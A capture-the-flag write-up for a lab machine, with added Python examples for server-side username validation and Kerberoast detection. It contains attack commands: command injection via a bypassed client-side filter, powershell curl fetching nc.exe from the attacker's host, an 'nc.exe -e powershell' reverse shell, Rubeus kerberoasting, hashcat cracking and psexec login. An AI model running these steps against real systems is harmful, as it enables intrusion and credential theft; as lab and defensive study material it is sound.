
Hack the hill #1 medium

  1. Network enumeration: nmap -sC -sT -vv <ip>

Check the website and create a new account.

Click on the profile and try to change the username to one containing different characters (; ? | " :) to see whether they are accepted.

You can't set a username with those characters.

Now open Inspect Element and look at the Network tab; you can see the directory of a script being loaded.

When you block this URL, the login input is no longer sanitized, because the check only ran in the browser.

From now on we can input payloads or commands.
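The weakness in the steps above is that the username filter lived only in a script the browser loads, so blocking that script removed the check entirely. The fix is to validate on the server, where the user cannot switch it off. The following is an added example, not code from the write-up or from the room's application; the allowlist policy (letters, digits, underscore, dot, hyphen, 3 to 32 characters) is an assumption, and the rejected characters are the ones the write-up tried.

```python
"""Server-side username validation (added example; the policy below is assumed)."""
import re

# Allowlist policy (assumed): letters, digits, underscore, dot, hyphen; 3-32 chars.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")

# Characters the write-up tried and the client-side script blocked.
# Listed here only to give a clearer reason string; the allowlist already rejects them.
SHELL_META = set(';?|":')


def validate_username(name: str) -> tuple[bool, str]:
    """Return (ok, reason). Runs on the server, so disabling browser scripts changes nothing."""
    if not isinstance(name, str):
        return False, "username must be a string"
    meta = sorted(set(name) & SHELL_META)
    if meta:
        return False, f"disallowed characters: {''.join(meta)}"
    if not USERNAME_RE.fullmatch(name):
        return False, "username must be 3-32 chars of [A-Za-z0-9_.-]"
    return True, "ok"


def handle_profile_update(form: dict) -> dict:
    """Minimal request handler: reject before the value reaches any storage or command."""
    ok, reason = validate_username(form.get("username", ""))
    if not ok:
        # 400, not 200: the client-side check is only a convenience, this is the real gate.
        return {"status": 400, "error": reason}
    return {"status": 200, "username": form["username"]}


if __name__ == "__main__":
    for candidate in ["achilles", "ach;illes", 'a"b', "ok_user.1", "ab"]:
        print(candidate, validate_username(candidate))
```

The point of keeping the reason string separate from the regex is purely diagnostic: the allowlist is what rejects the input, and an attacker who bypasses every client-side script still hits `handle_profile_update` on the server.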

Our plan now is to put a listener on the victim machine.

To copy/transfer nc.exe we are going to use Python:

python -m http.server

Then we can input this command on the victim website: powershell curl <ip>:8000/nc.exe -o nc.exe

Alright…

Let's set up a new listener with netcat:

nc -lvnp 4343

We will now run "nc.exe <ip> <port> -e powershell" to gain a reverse shell.

And now we have a shell.

Let's check the users.

Let's prepare Rubeus.exe, the tool we will use for privilege escalation.

Set up the listener again so we can transfer Rubeus.exe to the victim machine (8000 is the default port of python -m http.server):

curl <ip>:8000/Rubeus.exe -o Rubeus.exe

We will now execute ".\Rubeus.exe kerberoast /nowrap".

Now let's crack the hash: hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
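The Kerberoast step above leaves a trace on the domain controller: every service ticket request is logged as Security Event 4769, and tools that request RC4-encrypted tickets for many service accounts in a short window stand out against normal traffic. The following is an added detection example, not code from the write-up or from Rubeus; the event records are constructed to mirror the 4769 fields (requesting account, service name, ticket encryption type, status code), and the threshold and window are assumptions a defender would tune.

```python
"""Flag likely Kerberoasting in Windows Security Event 4769 records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Fields mirror 4769: TargetUserName is
# the requesting account, ServiceName the SPN's account, TicketEncryptionType the
# etype, Status the Kerberos result code (0x0 = success).
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:01", "account": "achilles@TROY.THM", "service": "sql_svc",   "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-01T10:00:02", "account": "achilles@TROY.THM", "service": "http_svc",  "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-01T10:00:02", "account": "achilles@TROY.THM", "service": "mssql_svc", "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-01T10:00:03", "account": "achilles@TROY.THM", "service": "WS01$",     "etype": "0x17", "status": "0x0"},
    {"time": "2024-01-01T10:05:00", "account": "bob@TROY.THM",      "service": "sql_svc",   "etype": "0x12", "status": "0x0"},
    {"time": "2024-01-01T10:06:00", "account": "bob@TROY.THM",      "service": "krbtgt",    "etype": "0x12", "status": "0x0"},
    {"time": "2024-01-01T11:00:00", "account": "carol@TROY.THM",    "service": "http_svc",  "etype": "0x17", "status": "0x0"},
]

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18) tickets are what offline cracking targets
# (hashcat mode 13100 in the write-up is the RC4 Kerberoast format).
RC4_ETYPES = {"0x17", "0x18"}


def is_roast_candidate(ev: dict) -> bool:
    """A successful RC4 service-ticket request for a user-style service account."""
    svc = ev["service"]
    return (
        ev["etype"].lower() in RC4_ETYPES
        and ev["status"] == "0x0"
        and not svc.endswith("$")        # machine accounts have random passwords; not crackable
        and svc.lower() != "krbtgt"      # TGT renewals are not roastable service tickets
    )


def find_kerberoasting(events, threshold: int = 3, window=timedelta(minutes=5)) -> dict:
    """Return {account: [spn, ...]} for accounts that requested >= threshold distinct
    roastable SPNs within `window`. Threshold and window are assumed tuning values."""
    by_account = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_account[ev["account"]].append(ev)

    alerts = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            start = datetime.fromisoformat(first["time"])
            spns = {
                e["service"] for e in evs[i:]
                if datetime.fromisoformat(e["time"]) - start <= window
            }
            if len(spns) >= threshold:
                alerts[account] = sorted(spns)
                break
    return alerts


if __name__ == "__main__":
    for account, spns in find_kerberoasting(SAMPLE_EVENTS).items():
        print(f"ALERT possible Kerberoast by {account}: {', '.join(spns)}")
```

Two caveats a practitioner would want: accounts that legitimately use RC4 (legacy service accounts, or a domain where AES is not enforced) will raise the baseline, so tune the threshold against your own 4769 volume; and the stronger mitigation is upstream of detection, namely long random passwords or group Managed Service Accounts for anything with an SPN and AES-only ticket encryption, so a ticket that is captured cannot be cracked with a wordlist the way the write-up does.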

Now let's use psexec.py:

psexec.py troy.thm/achilles:(password)@<ip>

And done.